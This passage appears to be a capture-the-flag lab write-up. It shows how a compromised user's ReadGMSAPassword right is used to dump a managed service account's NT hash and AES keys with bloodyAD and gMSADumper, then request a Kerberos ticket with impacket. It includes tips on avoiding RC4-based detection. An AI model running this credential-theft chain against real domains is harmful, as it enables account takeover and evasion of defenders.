ReadgMSAPassword
According to the earlier assessment, the ted.graves user has ReadGMSAPassword access configured over the machine account svc_int$. Now that ted.graves has been compromised, I can use that access to move forward.
msDS-ManagedPassword is the constructed LDAP attribute that exposes a gMSA's current password, returned as an MSDS-MANAGEDPASSWORD_BLOB structure. The DC only hands it out to principals listed in the account's msDS-GroupMSAMembership, and only over an encrypted channel (LDAPS, or LDAP with Kerberos signing and sealing), so a plain-text LDAP query will simply omit the attribute. I could just request it with bloodyAD, which handles the secure binding and decodes the blob:
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ bloodyAD -d INTELLIGENCE.HTB -u ted.graves -p 'Mr.Teddy' --host dc.intelligence.htb get object 'svc_int$' --resolve-sd --attr msDS-ManagedPassword
distinguishedname: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msds-managedpassword.ntlm: aad3b435b51404eeaad3b435b51404ee:ff3418066942aa8bd228ea17dc71999a
msds-managedpassword.b64encoded: I1tfJC/WE1fkf8go0H8t+TzuNS1gzRLOe/W/czO9odbBPDhOB2oMrmMFCWpyscJnCA1UtfDqb7zV4HkusuK30JcPhXL0ryf8Z2RiRzDHqav2YjYP9+0XEm8zqf6nzp2VcyBQFUZiQWpRtTKho7gkpJdDjInFHLlfLpFdIOxW+yGbcmL+PLjV+Y0SnrU1rCh+EHRfTxo6hLA0MSd5PqGaK+1X57Cib+CKWLO+gEuJkQHKaK3hCGXC1wqIMrBrCyJ+qUtZBh/HCM5C7mcYMLK+9ztRpcQ7cJ44RRtLprbX0glWFt9SGA5us9DgnaeId7QSro2P5Y1fgrwhMO+gmUp+yQ==
In aad3b435b51404eeaad3b435b51404ee:ff3418066942aa8bd228ea17dc71999a the first half is the constant LM hash of an empty password; ff3418066942aa8bd228ea17dc71999a is the NT hash of the machine account svc_int$, i.e. the MD4 of the 256-byte password carried in the blob (the b64encoded value above is that raw password). It can be used as-is for pass-the-hash or with impacket's -hashes option.
Kerberos Secrets
Technically, it is also possible to retrieve the Kerberos secrets (the AES128 and AES256 keys) derived from the same password, which is preferable for OPSEC: a TGT requested with an AES key uses etype 17/18, whereas authenticating with the NT hash forces RC4 (etype 23), and an RC4 ticket request for an account that supports AES is a well-known detection (event 4768/4769 with encryption type 0x17). Three well-known tools can be used for the operation:
- DSInternals: a PowerShell module
- GMSAPasswordReader: a C# executable
- gMSADumper: a Python script
Both DSInternals and GMSAPasswordReader require a valid session on a domain-joined system as the reading user, ted.graves, whereas gMSADumper can be run remotely from the attacking host:
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ python3 gMSADump.py -d INTELLIGENCE.HTB -u ted.graves -p 'Mr.Teddy' -l dc.intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
Those are the additional Kerberos secrets in AES128 and AES256 form. The listing also confirms who is allowed to read the password (DC$ and the itsupport group), and the NT hash matches the bloodyAD result, as expected: both tools derive their output from the same 256-byte password, the NT hash being its MD4 and the AES keys coming from the Kerberos string-to-key function over it with the standard computer-account salt (uppercase realm, host, lowercase account name without the $, a dot, lowercase DNS domain). Note that a gMSA password rotates automatically (every 30 days by default), so these secrets have to be re-read after a rotation.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ impacket-getTGT 'intelligence.htb/svc_int$@dc.intelligence.htb' -aesKey 30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in svc_int$@dc.intelligence.htb.ccache
Validated: a TGT was saved for the svc_int$ account, which proves the AES256 key is correct. The ccache file name simply mirrors the principal string passed on the command line; exporting it as KRB5CCNAME and passing -k -no-pass to the next impacket tool lets that tool authenticate as svc_int$ with the ticket.